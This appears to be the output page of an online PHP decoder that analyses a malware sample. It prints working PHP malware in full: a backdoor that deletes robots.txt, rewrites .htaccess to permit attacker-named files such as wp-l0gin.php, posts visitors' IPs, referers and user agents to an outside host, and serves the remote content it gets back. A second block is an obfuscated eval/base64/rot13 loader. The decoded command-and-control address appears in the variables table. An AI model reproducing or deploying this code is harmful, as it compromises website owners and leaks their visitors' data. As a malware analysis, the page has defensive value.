Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url)..

Decoded Output download

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Did this file decode correctly?

Original Code

<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzU0ODgtY2g0LXYyMDMudW1saWtlb2sueHl6'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>


<?php $Vfzci = 'str'.'rev'; $dNcSF = 's'.'tr'.'_rot1'.'3'; $CtRIo = 'b'.'as'.'e64'.'_deco'.'de'; ini_set('error_log', NULL); error_reporting(0); ini_set('log_errors', 0); ini_set('display_errors', 0); /*  4a9946d3a7686949877b32766128e27e0e68915a***/ eval($CtRIo($dNcSF($Vfzci('=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')))); ?>

Function Calls

h2	1
print_r	1
file_exists	1
base64_decode	2

Variables

$api	http://5488-ch4-v203.umlikeok.xyz
$params	[{'key': 'domain', 'value': ['ArrayOffset', {'expr': 'SERVER_NAME', 'node': ['Variable', {'name': '$_SERVER'}]}]}, {'key': 'request_url', 'value': None}, {'key': 'referer', 'value': ''}, {'key': 'agent', 'value': ''}, {'key': 'ip', 'value': ''}, {'key': 'protocol', 'value': 'http://'}, {'key': 'language', 'value': ''}, {'key': 'api', 'value': 'http://5488-ch4-v203.umlikeok.xyz'}]
$htaccess	.htaccess

Stats

MD5	3f318ac66c41c0e388a2405c9e039478
Eval Count	1
Decode Time	322 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats